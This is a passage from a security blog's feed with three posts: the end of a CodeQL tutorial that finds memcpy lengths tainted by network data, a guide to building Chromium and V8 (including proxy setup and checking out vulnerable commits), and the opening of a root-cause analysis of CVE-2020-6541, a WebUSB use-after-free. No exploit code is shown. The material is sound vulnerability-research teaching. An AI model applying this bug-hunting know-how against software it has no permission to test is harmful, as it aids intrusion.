class="built_in">getExpr</span>() <span class="comment">// 注意这里的.getExpr()</span></span><br></pre></td></tr></table></figure></li><li><p>Step9：编写一个类。用<code>exists</code>关键字来引入一个临时变量，以设置当前类的数据集合；特征谓词在声明时会被调用以确定当前类的范围，类似于C++构造函数。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span 
class="line"><span class="keyword">import</span> cpp</span><br><span class="line"></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">NetworkByteSwap</span> extends Expr&#123;</span><br><span class="line">    <span class="built_in">NetworkByteSwap</span>()</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="built_in">exists</span>(MacroInvocation mi |</span><br><span class="line">            mi.<span class="built_in">getMacroName</span>().<span class="built_in">regexpMatch</span>(<span class="string">&quot;ntoh(s|l|ll)&quot;</span>) <span class="keyword">and</span></span><br><span class="line">            <span class="keyword">this</span> = mi.<span class="built_in">getExpr</span>()</span><br><span class="line">          )</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">from NetworkByteSwap n</span><br><span class="line">select n, <span class="string">&quot;Network byte swap&quot;</span></span><br></pre></td></tr></table></figure></li><li><p>Step10：数据流分析。若<code>memcpy</code>中<code>length</code>直接来自于远程，而不加以验证，那么这将会产生OOB漏洞。以下编写的CodeQL查询针对的就是这类情况，它将使用全局数据流分析技术，查出真正的CVE漏洞。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span 
class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> cpp</span><br><span class="line"><span class="keyword">import</span> semmle.code.cpp.dataflow.TaintTracking</span><br><span class="line"><span class="keyword">import</span> DataFlow::PathGraph</span><br><span class="line"></span><br><span class="line"><span class="comment">// Class modelling network byte-swap expressions</span></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">NetworkByteSwap</span> extends Expr&#123;</span><br><span class="line">    <span class="built_in">NetworkByteSwap</span>()    &#123;</span><br><span class="line">        <span class="built_in">exists</span>(MacroInvocation mi |</span><br><span class="line">            mi.<span class="built_in">getMacroName</span>().<span class="built_in">regexpMatch</span>(<span class="string">&quot;ntoh(s|l|ll)&quot;</span>) <span class="keyword">and</span></span><br><span class="line">            <span class="keyword">this</span> = mi.<span class="built_in">getExpr</span>()</span><br><span class="line">          )</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">// Taint tracking configuration</span></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">Config</span> extends TaintTracking::Configuration&#123;</span><br><span class="line">    <span class="built_in">Config</span>() &#123; <span class="keyword">this</span> = <span class="string">&quot;NetworkToMemFuncLength&quot;</span>&#125;</span><br><span class="line">    <span class="comment">// Override isSource: 
this predicate selects the expressions where the data flow starts.</span></span><br><span class="line">    <span class="keyword">override</span> predicate <span class="built_in">isSource</span>(DataFlow::Node source)&#123;</span><br><span class="line">        source.<span class="built_in">asExpr</span>() instanceof NetworkByteSwap</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// Override isSink: this predicate selects the expressions where the data flow ends.</span></span><br><span class="line">    <span class="keyword">override</span> predicate <span class="built_in">isSink</span>(DataFlow::Node sink)&#123;</span><br><span class="line">        <span class="built_in">exists</span>(FunctionCall c | c.<span class="built_in">getTarget</span>().<span class="built_in">getName</span>() = <span class="string">&quot;memcpy&quot;</span> <span class="keyword">and</span> sink.<span class="built_in">asExpr</span>() = c.<span class="built_in">getArgument</span>(<span class="number">2</span>))</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">// Query</span></span><br><span class="line">from Config cfg, DataFlow::PathNode source, DataFlow::PathNode sink</span><br><span class="line">where cfg.<span class="built_in">hasFlowPath</span>(source, sink)</span><br><span class="line">select sink, source, sink, <span class="string">&quot;Network byte swap flows to memcpy&quot;</span></span><br></pre></td></tr></table></figure></li></ul><h2 id="八、结语">8. Conclusion</h2><ul><li>Once we know CodeQL well, we can use it to hunt for vulnerabilities that match a specific bug pattern.</li><li>That covers the basics of CodeQL. Going deeper means reading through the QL APIs and combining them; the <a href="https://help.semmle.com/QL/learn-ql/cpp/introduce-libraries-cpp.html">CodeQL library for C and C++</a> is the place to start.</li></ul>]]></content>
    
    
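    <summary type="html">&lt;h2 id=&quot;一、简介&quot;&gt;1. Introduction&lt;/h2&gt;
&lt;p&gt;CodeQL is a semantic code analysis engine that scans a codebase for vulnerabilities. It lets you query code as though it were data: write a query to find every variant of a vulnerability and eliminate it, then share your queries with others.&lt;/p&gt;</summary>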
    
    
    
    <category term="天问之路" scheme="https://kiprey.github.io/categories/%E5%A4%A9%E9%97%AE%E4%B9%8B%E8%B7%AF/"/>
    
    
    <category term="CodeQL" scheme="https://kiprey.github.io/tags/CodeQL/"/>
    
  </entry>
  
  <entry>
    <title>Fetching &amp; Building the chromium &amp; v8 Source Code</title>
    <link href="https://kiprey.github.io/2020/11/fetch-chromium/"/>
    <id>https://kiprey.github.io/2020/11/fetch-chromium/</id>
    <published>2020-11-19T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:40.002Z</updated>
    
    <content type="html"><![CDATA[<h2 id="一、背景">一、背景</h2><ul><li><p>由于chromium的多线程、多进程机制较为复杂，因此调试起来较为麻烦，通过源代码层面打log来调试显得十分必要，而且源码级调试可以大幅度降低调试难度。</p></li><li><p>同时，倘若需要某个特定版本的chromium时，委托他人代为编译也较为不便，</p></li><li><p>因此，手动编译chromium是十分必要的。在这篇文章中，笔者将自己下拉代码&amp;编译代码的步骤列入其中，仅供参考。</p></li></ul><span id="more"></span><h2 id="二、前置操作">二、前置操作</h2><ul><li><p>由于国内神奇的网络环境，我们需要设置一下代理服务</p></li><li><p>首先在linux端下载shadowsocksr</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">git <span class="built_in">clone</span> git@github.com:shadowsocksrr/shadowsocksr.git</span><br></pre></td></tr></table></figure><p>修改<code>shadowsocksr/user-config.json</code>的内容</p><figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">&#123;</span></span><br><span class="line">    <span class="attr">&quot;server&quot;</span><span class="punctuation">:</span> <span class="string">&quot;&lt;server IP&gt;&quot;</span><span class="punctuation">,</span>          <span class="comment">// 服务器IP</span></span><br><span class="line">    <span 
class="attr">&quot;server_ipv6&quot;</span><span class="punctuation">:</span> <span class="string">&quot;::&quot;</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;server_port&quot;</span><span class="punctuation">:</span> &lt;server Port&gt;<span class="punctuation">,</span>     <span class="comment">// 服务器的ssr端口</span></span><br><span class="line">    <span class="attr">&quot;local_address&quot;</span><span class="punctuation">:</span> <span class="string">&quot;127.0.0.1&quot;</span><span class="punctuation">,</span>     <span class="comment">// 本地地址，这里无需修改</span></span><br><span class="line">    <span class="attr">&quot;local_port&quot;</span><span class="punctuation">:</span> <span class="number">52001</span><span class="punctuation">,</span>              <span class="comment">// 本地用于监听socks5的端口，ssr开启后请求将转发至该端口</span></span><br><span class="line"></span><br><span class="line">    <span class="attr">&quot;password&quot;</span><span class="punctuation">:</span> <span class="string">&quot;&lt;server Password&gt;&quot;</span><span class="punctuation">,</span>  <span class="comment">// 服务器端的ssr密码</span></span><br><span class="line">    <span class="attr">&quot;method&quot;</span><span class="punctuation">:</span> <span class="string">&quot;rc4-md5&quot;</span><span class="punctuation">,</span>              <span class="comment">// 加密方式</span></span><br><span class="line">    <span class="attr">&quot;protocol&quot;</span><span class="punctuation">:</span> <span class="string">&quot;auth_aes128_md5&quot;</span><span class="punctuation">,</span>    <span class="comment">// 协议</span></span><br><span class="line">    <span class="attr">&quot;protocol_param&quot;</span><span class="punctuation">:</span> <span class="string">&quot;&quot;</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;obfs&quot;</span><span class="punctuation">:</span> <span 
class="string">&quot;tls1.2_ticket_auth&quot;</span><span class="punctuation">,</span>     <span class="comment">// obfs</span></span><br><span class="line">    <span class="attr">&quot;obfs_param&quot;</span><span class="punctuation">:</span> <span class="string">&quot;&quot;</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;speed_limit_per_con&quot;</span><span class="punctuation">:</span> <span class="number">0</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;speed_limit_per_user&quot;</span><span class="punctuation">:</span> <span class="number">0</span><span class="punctuation">,</span></span><br><span class="line"></span><br><span class="line">    <span class="attr">&quot;additional_ports&quot;</span> <span class="punctuation">:</span> <span class="punctuation">&#123;</span><span class="punctuation">&#125;</span><span class="punctuation">,</span> <span class="comment">// only works under multi-user mode</span></span><br><span class="line">    <span class="attr">&quot;additional_ports_only&quot;</span> <span class="punctuation">:</span> <span class="literal"><span class="keyword">false</span></span><span class="punctuation">,</span> <span class="comment">// only works under multi-user mode</span></span><br><span class="line">    <span class="attr">&quot;timeout&quot;</span><span class="punctuation">:</span> <span class="number">120</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;udp_timeout&quot;</span><span class="punctuation">:</span> <span class="number">60</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;dns_ipv6&quot;</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">false</span></span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;connect_verbose_info&quot;</span><span 
class="punctuation">:</span> <span class="number">0</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;redirect&quot;</span><span class="punctuation">:</span> <span class="string">&quot;&quot;</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;fast_open&quot;</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">false</span></span></span><br><span class="line"><span class="punctuation">&#125;</span></span><br></pre></td></tr></table></figure><p>Next, enter <code>shadowsocksr/shadowsocks/</code> and run <code>local.py</code> to start the local SOCKS5 proxy:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">sudo</span> python local.py</span><br></pre></td></tr></table></figure><blockquote><p>There is also a server.py file, which is used to set up an SSR node on the server side. We do not need it here, so it can be ignored.</p></blockquote><p>After that, a SOCKS5 listener is created on the local <code>local_port</code> (port 52001 with the configuration above). All data sent to this port is forwarded to the remote SSR node.</p><blockquote><p>Use <code>netstat -ntlp</code> to check the listening ports.</p></blockquote></li><li><p>With SOCKS5 in place, we need an HTTP/HTTPS forwarding proxy so that HTTP/HTTPS traffic can be relayed into the SOCKS5 proxy.</p><p>To do that, install <code>privoxy</code>, append one forwarding directive to its configuration file, and restart the service. The configuration file is owned by root, so the line is appended through <code>sudo tee -a</code> rather than a plain shell redirect.</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">sudo</span> apt-get install privoxy</span><br><span class="line"><span class="built_in">echo</span> <span class="string">&quot;forward-socks5 / 127.0.0.1:52001 .&quot;</span> | <span class="built_in">sudo</span> <span class="built_in">tee</span> -a /etc/privoxy/config</span><br><span class="line"><span class="built_in">sudo</span> service privoxy restart</span><br></pre></td></tr></table></figure></li><li><p>The proxy service is now running. Privoxy listens on 127.0.0.1:8118 by default, so we point curl and git at that address.</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span 
class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">export</span> http_proxy=http://127.0.0.1:8118</span><br><span class="line"><span class="built_in">export</span> https_proxy=http://127.0.0.1:8118</span><br><span class="line">git config --global http.proxy http://127.0.0.1:8118</span><br><span class="line">git config --global https.proxy http://127.0.0.1:8118</span><br></pre></td></tr></table></figure><p>Note that the proxy URL uses the <code>http://</code> scheme in every case: Privoxy is a plain HTTP proxy, and HTTPS traffic is tunnelled through it.</p></li><li><p>With the git proxy configured, we can download the most important tool, <code>depot_tools</code>, which is used to fetch the Chromium/V8 source.</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># clone depot_tools and add its directory to the PATH environment variable</span></span><br><span class="line"><span class="comment"># the clone succeeds now that git goes through the proxy</span></span><br><span class="line">git <span class="built_in">clone</span> https://chromium.googlesource.com/chromium/tools/depot_tools.git</span><br><span class="line"><span class="comment"># replace /path/to/depot_tools with the actual depot_tools directory</span></span><br><span class="line"><span class="built_in">echo</span> <span class="string">&#x27;export PATH=$PATH:&quot;/path/to/depot_tools&quot;&#x27;</span> &gt;&gt; ~/.bashrc</span><br><span class="line"><span class="comment"># reload the .bashrc configuration</span></span><br><span class="line"><span class="built_in">source</span> ~/.bashrc</span><br></pre></td></tr></table></figure></li></ul><h2 id="三、chromium代码下拉及编译">III. Fetching and Building Chromium</h2><ul><li><p>Fetching the Chromium source takes a single command, but it must go through the git proxy:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">fetch 
chromium</span><br></pre></td></tr></table></figure><p>The full checkout is roughly 24 GB. The most important thing while fetching is <strong>a stable network connection</strong>. Because git clone cannot resume an interrupted transfer, <strong>a single network hiccup that drops the connection means starting over.</strong></p><blockquote><p>This is the only practical way to get the Chromium source. Downloading the code from GitHub first and then sorting out the dependencies by hand does not work.</p></blockquote></li><li><p>Once the code is fetched, install the build dependencies:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">sudo</span> src/build/install-build-deps.sh</span><br></pre></td></tr></table></figure><p>If the script does not support your Linux distribution, you can try building directly. The build may occasionally stop because some command is missing; in that case, install the corresponding package manually and continue.</p></li><li><p>Then select the git revision to build:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># switch revision (run inside src/); skip this command when building the latest version</span></span><br><span class="line"><span class="comment"># to debug a vulnerability, switch to the vulnerable commit here</span></span><br><span class="line">git reset --hard [commit <span class="built_in">hash</span> with vulnerability]</span><br><span class="line"><span class="comment"># download the dependencies matching that revision</span></span><br><span class="line">gclient <span class="built_in">sync</span></span><br></pre></td></tr></table></figure></li><li><p>Start the build:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># generate the build configuration</span></span><br><span class="line">  <span class="comment"># is_debug = true keeps full debug information in the Chromium build</span></span><br><span class="line">  <span class="comment"># is_component_build = 
true splits the build into many separate .so/.dll files, which reduces link time</span></span><br><span class="line">  <span class="comment"># is_asan = true enables ASan at build time</span></span><br><span class="line">gn gen out/asan_debug --args=<span class="string">&quot;is_debug=true is_component_build=true is_asan=true&quot;</span></span><br><span class="line"><span class="comment"># start the build; expect it to take about 4 hours</span></span><br><span class="line">autoninja -C out/asan_debug chrome</span><br></pre></td></tr></table></figure></li><li><p>When the build finishes, Chromium can be launched:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./out/asan_debug/chrome</span><br></pre></td></tr></table></figure><p>When I launched Chromium, ASan reported an <code>odr-violation</code> error:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Kiprey @ Kipwn in /usr/class/chromium [14:19:24] C:1</span></span><br><span class="line">$ ./src/out/asan_debug/chrome</span><br><span class="line">=================================================================</span><br><span class="line">==189815==ERROR: AddressSanitizer: odr-violation (0x7f44b9504700):</span><br><span class="line">  [1] size=40 <span class="string">&#x27;vtable for media::VaapiDmaBufVideoFrameMapper&#x27;</span> 
../../media/gpu/vaapi/vaapi_dmabuf_video_frame_mapper.cc</span><br><span class="line">  [2] size=40 <span class="string">&#x27;vtable for media::VaapiDmaBufVideoFrameMapper&#x27;</span> ../../media/gpu/vaapi/vaapi_dmabuf_video_frame_mapper.cc</span><br><span class="line">These globals were registered at these points:</span><br><span class="line">  [1]:</span><br><span class="line">    <span class="comment">#0 0x55f8a95f810d in __asan_register_globals /b/s/w/ir/cache/builder/src/third_party/llvm/compiler-rt/lib/asan/asan_globals.cpp:360:3</span></span><br><span class="line">    <span class="comment">#1 0x7f4471d6895b in asan.module_ctor (/usr/class/chromium/src/out/asan_debug/libservice.so+0x2b5595b)</span></span><br><span class="line"></span><br><span class="line">  [2]:</span><br><span class="line">    <span class="comment">#0 0x55f8a95f810d in __asan_register_globals /b/s/w/ir/cache/builder/src/third_party/llvm/compiler-rt/lib/asan/asan_globals.cpp:360:3</span></span><br><span class="line">    <span class="comment">#1 0x7f44b87abe7b in asan.module_ctor (/usr/class/chromium/src/out/asan_debug/libmedia_gpu.so+0x335e7b)</span></span><br><span class="line"></span><br><span class="line">==189815==HINT: <span class="keyword">if</span> you don<span class="string">&#x27;t care about these errors you may set ASAN_OPTIONS=detect_odr_violation=0</span></span><br><span class="line"><span class="string">SUMMARY: AddressSanitizer: odr-violation: global &#x27;</span>vtable <span class="keyword">for</span> media::VaapiDmaBufVideoFrameMapper<span class="string">&#x27; at ../../media/gpu/vaapi/vaapi_dmabuf_video_frame_mapper.cc</span></span><br><span class="line"><span class="string">==189815==ABORTING</span></span><br><span class="line"><span class="string"></span></span><br></pre></td></tr></table></figure><p><code>odr-violation</code> errors like this one can simply be ignored. As the hint in the log suggests, we do so by setting the <code>ASAN_OPTIONS</code> environment variable:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span 
class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">export</span> ASAN_OPTIONS=detect_odr_violation=0</span><br></pre></td></tr></table></figure><p>After that, chrome runs normally.</p></li></ul><h2 id="四、v8代码下拉及编译">IV. Fetching and Building V8</h2><ul><li><p>Fetching the V8 source is just as simple: one command, again through the git proxy.</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">fetch v8</span><br></pre></td></tr></table></figure></li><li><p>The rest mirrors the Chromium build: select the git revision, generate the build configuration, then build.</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">cd</span> v8</span><br><span class="line"><span class="comment"># skip this command when building the latest version</span></span><br><span class="line"><span class="comment"># to debug a vulnerability, switch to the vulnerable commit here</span></span><br><span class="line">git reset --hard [commit <span class="built_in">hash</span> with vulnerability]</span><br><span class="line"><span class="comment"># gclient sync downloads the other required dependencies;</span></span><br><span class="line"><span class="comment"># it also needs the curl proxy, which was set through the environment variables earlier</span></span><br><span class="line">gclient <span class="built_in">sync</span></span><br><span class="line"><span class="comment"># generate the build configuration</span></span><br><span class="line">tools/dev/v8gen.py x64.debug</span><br><span class="line"><span class="comment"># build</span></span><br><span class="line">ninja -C out.gn/x64.debug</span><br></pre></td></tr></table></figure><blockquote><p>To switch to a specific release version, use the following commands:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span 
class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># &lt;TagName&gt; here is the version number</span></span><br><span class="line"><span class="comment"># check whether the version/tag exists</span></span><br><span class="line">git tag | grep <span class="string">&quot;&lt;TagName&gt;&quot;</span></span><br><span class="line"><span class="comment"># switch to the target version/tag</span></span><br><span class="line">git checkout &lt;TagName&gt;</span><br><span class="line"><span class="comment"># download the matching dependencies</span></span><br><span class="line">gclient <span class="built_in">sync</span></span><br></pre></td></tr></table></figure></blockquote></li><li><p>When the build finishes, V8 can be run through the d8 shell:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./out.gn/x64.debug/d8</span><br></pre></td></tr></table></figure></li><li><p>V8 also ships with gdb helpers that make debugging V8 under gdb more convenient.</p><p>Add the following two lines to <code>~/.gdbinit</code> to enable them:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">source</span> /path/to/v8/tools/gdbinit</span><br><span class="line"><span class="built_in">source</span> /path/to/v8/tools/gdb-v8-support.py</span><br></pre></td></tr></table></figure><p>If you are interested, skim through these two files to get a better idea of how the V8 helpers are used.</p></li></ul><h2 id="五、参考">V. References</h2><ul><li><p><a href="https://mem2019.github.io/jekyll/update/2019/07/18/V8-Env-Config.html">V8环境搭建，100%成功版</a></p></li><li><p><a href="https://chromium.googlesource.com/chromium/src/+/master/docs/linux/build_instructions.md">Checking out and building Chromium on Linux</a></p></li></ul>]]></content>
    
    
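    <summary type="html">&lt;h2 id=&quot;一、背景&quot;&gt;I. Background&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;Chromium&#39;s multi-threaded, multi-process architecture is complex, which makes it awkward to debug. Adding log statements at the source level is often necessary, and source-level debugging makes the whole process much easier.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;In addition, when a specific Chromium version is needed, asking someone else to build it is inconvenient.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Building Chromium yourself is therefore well worth the effort. This post records the steps I used to fetch and build the code, for reference only.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;</summary>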
    
    
    
    <category term="chrome" scheme="https://kiprey.github.io/categories/chrome/"/>
    
    
    <category term="v8" scheme="https://kiprey.github.io/tags/v8/"/>
    
    <category term="chrome" scheme="https://kiprey.github.io/tags/chrome/"/>
    
  </entry>
  
  <entry>
    <title>CVE-2020-6541 Analysis</title>
    <link href="https://kiprey.github.io/2020/10/CVE-2020-6541/"/>
    <id>https://kiprey.github.io/2020/10/CVE-2020-6541/</id>
    <published>2020-10-26T07:24:31.000Z</published>
    <updated>2025-11-24T03:59:39.770Z</updated>
    
    <content type="html"><![CDATA[<h2 id="一、简介">I. Introduction</h2><ul><li><p>CVE-2020-6541 is a use-after-free vulnerability in WebUSB in Chromium. In versions before 84.0.4147.105, it allows an attacker to cause heap corruption through a crafted HTML page.</p><span id="more"></span></li></ul><h2 id="二、漏洞相关">II. The Vulnerability</h2><blockquote><p>The previous post analyzed CVE-2020-6549. That bug follows exactly the same pattern as CVE-2020-6541, which we analyze here:</p><blockquote><p><strong>An outer loop uses an iterator to repeatedly call an inner function; the inner function runs a JS function; and that JS function in turn calls something that invalidates the iterator used by the outer loop.</strong></p></blockquote><p>This analysis therefore focuses on the Promise Resolve flow and on writing the POC.</p></blockquote><h3 id="1-漏洞细节">1. Vulnerability details</h3><ul><li><p>Below is the <a href="https://source.chromium.org/chromium/chromium/src/+/master:third_party/blink/renderer/modules/webusb/usb.cc;drc=52bc92da6df065ff12ee81563e23fde2e8db94f9;l=249">source of the vulnerable function</a>:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">USB::OnServiceConnectionError</span><span class="params">()</span> </span>&#123;</span><br><span class="line">  service_.<span class="built_in">reset</span>();</span><br><span class="line">  client_receiver_.<span class="built_in">reset</span>();</span><br><span class="line">  <span class="keyword">for</span> (ScriptPromiseResolver* resolver : get_devices_requests_)</span><br><span class="line">    <span class="comment">// note the Resolve call here</span></span><br><span class="line">    resolver-&gt;<span class="built_in">Resolve</span>(HeapVector&lt;Member&lt;USBDevice&gt;&gt;(<span class="number">0</span>));</span><br><span class="line">  
get_devices_requests_.<span class="built_in">clear</span>();</span><br><span class="line"></span><br><span class="line">  <span class="keyword">for</span> (ScriptPromiseResolver* resolver : get_permission_requests_) &#123;</span><br><span class="line">    resolver-&gt;<span class="built_in">Reject</span>(<span class="built_in">MakeGarbageCollected</span>&lt;DOMException&gt;(</span><br><span class="line">        DOMExceptionCode::kNotFoundError, kNoDeviceSelected));</span><br><span class="line">  &#125;</span><br><span class="line">  get_permission_requests_.<span class="built_in">clear</span>();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p><code>OnServiceConnectionError</code> calls <code>Resolve</code> internally, and <code>Resolve</code> can synchronously run user-defined JavaScript. If that JavaScript calls <code>USB::getDevices</code>, the call modifies the <code>get_devices_requests_</code> hash set while the loop is still iterating over it.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">ScriptPromise <span class="title">USB::getDevices</span><span class="params">(ScriptState* script_state,</span></span></span><br><span class="line"><span class="params"><span class="function">                              ExceptionState&amp; exception_state)</span> </span>&#123;</span><br><span class="line">  <span class="comment">// ...</span></span><br><span class="line">  <span class="built_in">EnsureServiceConnection</span>();</span><br><span class="line">  <span class="keyword">auto</span>* resolver = <span class="built_in">MakeGarbageCollected</span>&lt;ScriptPromiseResolver&gt;(script_state);</span><br><span class="line">  
<span class="comment">// note the insert here</span></span><br><span class="line">  get_devices_requests_.<span class="built_in">insert</span>(resolver);</span><br><span class="line">  service_-&gt;<span class="built_in">GetDevices</span>(WTF::<span class="built_in">Bind</span>(&amp;USB::OnGetDevices, <span class="built_in">WrapPersistent</span>(<span class="keyword">this</span>),</span><br><span class="line">                                 <span class="built_in">WrapPersistent</span>(resolver)));</span><br><span class="line">  <span class="keyword">return</span> resolver-&gt;<span class="built_in">Promise</span>();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>The insertion invalidates the iterator used by the range-based for loop, since inserting into a hash set can trigger a rehash that reallocates its backing store. On the next iteration of the loop, <strong>using the invalidated iterator results in a UAF</strong>.</p></li></ul><h3 id="2-Promise的简单研究">2. A brief look at Promise</h3><blockquote><p>The key point of this vulnerability <strong>has already been covered in the few sentences above</strong>. The rest of this analysis therefore walks through the Promise call chain. The call chain is not specific to the vulnerability; it is included as background reading.</p></blockquote><ul><li><p><code>USB::OnServiceConnectionError</code> calls <code>resolver-&gt;Resolve</code> inside the iterator-based for loop, and <code>Resolve</code> in turn calls <code>ResolveOrReject</code>:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Anything that can be passed to toV8 can be passed to this function.</span></span><br><span class="line"><span class="keyword">template</span> &lt;<span class="keyword">typename</span> T&gt;</span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">Resolve</span><span class="params">(T value)</span> </span>&#123;</span><br><span class="line">  <span class="built_in">ResolveOrReject</span>(value, kResolving);</span><br><span 
